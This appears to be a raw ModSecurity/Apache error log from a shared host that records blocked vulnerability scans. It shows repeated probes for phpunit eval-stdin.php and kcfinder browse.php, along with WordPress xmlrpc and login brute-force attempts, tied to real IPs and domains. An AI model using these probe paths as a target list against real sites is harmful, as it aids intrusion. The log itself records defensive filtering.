[Tue May 26 14:40:20.787528 2026] [security2:error] [pid 636820:tid 636958] [client 108.136.162.67:58321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVjfK_r6oOphPch7B9wigAAAAg"]
[Tue May 26 14:40:20.936259 2026] [security2:error] [pid 636820:tid 636978] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjfK_r6oOphPch7B9wfgAAABw"]
[Tue May 26 14:40:21.618987 2026] [security2:error] [pid 636820:tid 637064] [client 108.136.162.67:58461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVjfa_r6oOphPch7B9wngAAAHI"]
[Tue May 26 14:40:22.422721 2026] [security2:error] [pid 636820:tid 636976] [client 108.136.162.67:58586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/_vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVjfq_r6oOphPch7B9wugAAABo"]
[Tue May 26 14:40:22.968279 2026] [security2:error] [pid 636820:tid 637048] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjfq_r6oOphPch7B9wwAAAAGI"]
[Tue May 26 14:40:23.482645 2026] [security2:error] [pid 636820:tid 637055] [client 108.136.162.67:58706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/administrator/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVjf6_r6oOphPch7B9w2QAAAGk"]
[Tue May 26 14:40:23.862121 2026] [security2:error] [pid 636820:tid 636843] [remote 74.7.241.58:53908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVjf6_r6oOphPch7B9w8AAAXBY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:40:24.280272 2026] [security2:error] [pid 636820:tid 636976] [client 108.136.162.67:58857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVjgK_r6oOphPch7B9w_AAAABo"]
[Tue May 26 14:40:24.413293 2026] [security2:error] [pid 636820:tid 637010] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjf6_r6oOphPch7B9w9AAAADw"]
[Tue May 26 14:40:25.017994 2026] [security2:error] [pid 636820:tid 637067] [client 202.141.83.254:5732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjgK_r6oOphPch7B9xDgAAAHU"]
[Tue May 26 14:40:25.018190 2026] [security2:error] [pid 636820:tid 637067] [client 202.141.83.254:5732] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjgK_r6oOphPch7B9xDgAAAHU"]
[Tue May 26 14:40:25.095725 2026] [security2:error] [pid 636820:tid 636955] [client 193.37.33.130:45601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVjgK_r6oOphPch7B9xDwAAAAU"]
[Tue May 26 14:40:25.144087 2026] [security2:error] [pid 636820:tid 637022] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjga_r6oOphPch7B9xFgAAAEg"]
[Tue May 26 14:40:25.676706 2026] [security2:error] [pid 636820:tid 637059] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjga_r6oOphPch7B9xJAAAAG0"]
[Tue May 26 14:40:26.557930 2026] [security2:error] [pid 636820:tid 637050] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjgq_r6oOphPch7B9xMQAAAGQ"]
[Tue May 26 14:40:26.896305 2026] [security2:error] [pid 636820:tid 637010] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjgq_r6oOphPch7B9xPgAAADw"]
[Tue May 26 14:40:27.233387 2026] [security2:error] [pid 636820:tid 636960] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjgq_r6oOphPch7B9xPQAAAAo"]
[Tue May 26 14:40:27.271525 2026] [security2:error] [pid 636820:tid 636984] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjg6_r6oOphPch7B9xSgAAACI"]
[Tue May 26 14:40:27.605948 2026] [security2:error] [pid 636820:tid 637064] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjg6_r6oOphPch7B9xUgAAAHI"]
[Tue May 26 14:40:27.937814 2026] [security2:error] [pid 636820:tid 636971] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjg6_r6oOphPch7B9xXwAAABU"]
[Tue May 26 14:40:28.280957 2026] [security2:error] [pid 636820:tid 636992] [client 87.218.148.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjg6_r6oOphPch7B9xWwAAACo"]
[Tue May 26 14:40:28.284244 2026] [security2:error] [pid 636820:tid 636977] [client 108.136.162.67:58988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjhK_r6oOphPch7B9xcQAAABs"]
[Tue May 26 14:40:28.627315 2026] [security2:error] [pid 636820:tid 636979] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjhK_r6oOphPch7B9xeAAAAB0"]
[Tue May 26 14:40:28.975613 2026] [security2:error] [pid 636820:tid 637070] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjhK_r6oOphPch7B9xhwAAAHg"]
[Tue May 26 14:40:29.139605 2026] [security2:error] [pid 636820:tid 637035] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjhK_r6oOphPch7B9xgQAAAFU"]
[Tue May 26 14:40:29.320090 2026] [security2:error] [pid 636820:tid 637055] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjha_r6oOphPch7B9xlAAAAGk"]
[Tue May 26 14:40:29.660215 2026] [security2:error] [pid 636820:tid 636983] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjha_r6oOphPch7B9xnAAAACE"]
[Tue May 26 14:40:30.002483 2026] [security2:error] [pid 636820:tid 637027] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjha_r6oOphPch7B9xqAAAAE0"]
[Tue May 26 14:40:30.340952 2026] [security2:error] [pid 636820:tid 636950] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjhq_r6oOphPch7B9xtQAAAAA"]
[Tue May 26 14:40:30.687087 2026] [security2:error] [pid 636820:tid 637032] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjhq_r6oOphPch7B9xxwAAAFI"]
[Tue May 26 14:40:31.032775 2026] [security2:error] [pid 636820:tid 636955] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjhq_r6oOphPch7B9x1AAAAAU"]
[Tue May 26 14:40:31.166315 2026] [security2:error] [pid 636820:tid 637060] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjhq_r6oOphPch7B9xzgAAAG4"]
[Tue May 26 14:40:31.374928 2026] [security2:error] [pid 636820:tid 636987] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjh6_r6oOphPch7B9x3QAAACU"]
[Tue May 26 14:40:31.791071 2026] [security2:error] [pid 636820:tid 637015] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjh6_r6oOphPch7B9x7gAAAEE"]
[Tue May 26 14:40:32.143466 2026] [security2:error] [pid 636820:tid 636988] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjiK_r6oOphPch7B9yAQAAACY"]
[Tue May 26 14:40:32.499270 2026] [security2:error] [pid 636820:tid 637006] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjiK_r6oOphPch7B9yDgAAADg"]
[Tue May 26 14:40:32.794268 2026] [security2:error] [pid 636820:tid 636967] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjiK_r6oOphPch7B9yCwAAABE"]
[Tue May 26 14:40:32.841110 2026] [security2:error] [pid 636820:tid 637040] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjiK_r6oOphPch7B9yEgAAAFo"]
[Tue May 26 14:40:33.182610 2026] [security2:error] [pid 636820:tid 636993] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjia_r6oOphPch7B9yHwAAACs"]
[Tue May 26 14:40:33.528414 2026] [security2:error] [pid 636820:tid 636976] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVjia_r6oOphPch7B9yJAAAABo"], referer: https://www.bloggertarget.com
[Tue May 26 14:40:33.540236 2026] [security2:error] [pid 636820:tid 636997] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjia_r6oOphPch7B9yLQAAAC8"]
[Tue May 26 14:40:33.895438 2026] [security2:error] [pid 636820:tid 636994] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjia_r6oOphPch7B9yOgAAACw"]
[Tue May 26 14:40:34.241250 2026] [security2:error] [pid 636820:tid 636974] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjiq_r6oOphPch7B9yQwAAABg"]
[Tue May 26 14:40:34.564585 2026] [security2:error] [pid 636820:tid 636951] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjiq_r6oOphPch7B9yUgAAAAE"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 14:40:34.603572 2026] [security2:error] [pid 636820:tid 636964] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjiq_r6oOphPch7B9yVQAAAA4"]
[Tue May 26 14:40:35.072956 2026] [security2:error] [pid 636820:tid 636997] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVji6_r6oOphPch7B9yZQAAAC8"], referer: http://anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 14:40:35.266861 2026] [security2:error] [pid 636820:tid 637062] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVji6_r6oOphPch7B9ybgAAAHA"]
[Tue May 26 14:40:35.526783 2026] [security2:error] [pid 636820:tid 637029] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVji6_r6oOphPch7B9yaAAAAE8"]
[Tue May 26 14:40:35.615111 2026] [security2:error] [pid 636820:tid 637006] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVji6_r6oOphPch7B9yeAAAADg"]
[Tue May 26 14:40:35.673394 2026] [security2:error] [pid 636820:tid 637009] [client 202.141.83.254:19845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVji6_r6oOphPch7B9yegAAADs"]
[Tue May 26 14:40:35.674108 2026] [security2:error] [pid 636820:tid 637009] [client 202.141.83.254:19845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVji6_r6oOphPch7B9yegAAADs"]
[Tue May 26 14:40:35.966433 2026] [security2:error] [pid 636820:tid 637036] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVji6_r6oOphPch7B9ykgAAAFY"]
[Tue May 26 14:40:36.334232 2026] [security2:error] [pid 636820:tid 636997] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjjK_r6oOphPch7B9yoQAAAC8"]
[Tue May 26 14:40:36.695058 2026] [security2:error] [pid 636820:tid 637029] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjjK_r6oOphPch7B9ysAAAAE8"]
[Tue May 26 14:40:36.779100 2026] [ssl:error] [pid 636820:tid 637014] [client 54.86.115.253:34637] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname www.usteve.com.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:40:37.057837 2026] [security2:error] [pid 636820:tid 637061] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjjK_r6oOphPch7B9yrgAAAG8"]
[Tue May 26 14:40:37.057991 2026] [security2:error] [pid 636820:tid 637073] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjjK_r6oOphPch7B9yugAAAHs"]
[Tue May 26 14:40:37.425492 2026] [security2:error] [pid 636820:tid 636963] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjja_r6oOphPch7B9yxwAAAA0"]
[Tue May 26 14:40:37.776105 2026] [security2:error] [pid 636820:tid 637064] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjja_r6oOphPch7B9yzgAAAHI"]
[Tue May 26 14:40:38.116469 2026] [security2:error] [pid 636820:tid 636979] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjjq_r6oOphPch7B9y2AAAAB0"]
[Tue May 26 14:40:38.384866 2026] [security2:error] [pid 636820:tid 637075] [client 108.136.162.67:58988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/ckeditor/kcfinder/browse.php"] [unique_id "ahVjjq_r6oOphPch7B9y5wAAAH0"]
[Tue May 26 14:40:39.064681 2026] [security2:error] [pid 636820:tid 636960] [client 114.119.144.143:30229] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahVjj6_r6oOphPch7B9y_AAAAAo"]
[Tue May 26 14:40:39.188889 2026] [security2:error] [pid 636820:tid 637022] [client 108.136.162.67:60876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/ckeditor/kcfinder/browse.php"] [unique_id "ahVjj6_r6oOphPch7B9zAwAAAEg"]
[Tue May 26 14:40:39.502441 2026] [security2:error] [pid 636820:tid 637058] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjj6_r6oOphPch7B9y_wAAAGw"]
[Tue May 26 14:40:40.004698 2026] [security2:error] [pid 636820:tid 637059] [client 108.136.162.67:61001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/asset/kcfinder/browse.php"] [unique_id "ahVjkK_r6oOphPch7B9zGwAAAG0"]
[Tue May 26 14:40:40.848739 2026] [security2:error] [pid 636820:tid 637061] [client 108.136.162.67:61114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/kcfinder/browse.php"] [unique_id "ahVjkK_r6oOphPch7B9zLgAAAG8"]
[Tue May 26 14:40:40.938815 2026] [security2:error] [pid 636820:tid 636958] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjkK_r6oOphPch7B9zKQAAAAg"]
[Tue May 26 14:40:41.624475 2026] [security2:error] [pid 636820:tid 636978] [client 108.136.162.67:61234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/plugins/kcfinder/browse.php"] [unique_id "ahVjka_r6oOphPch7B9zSQAAABw"]
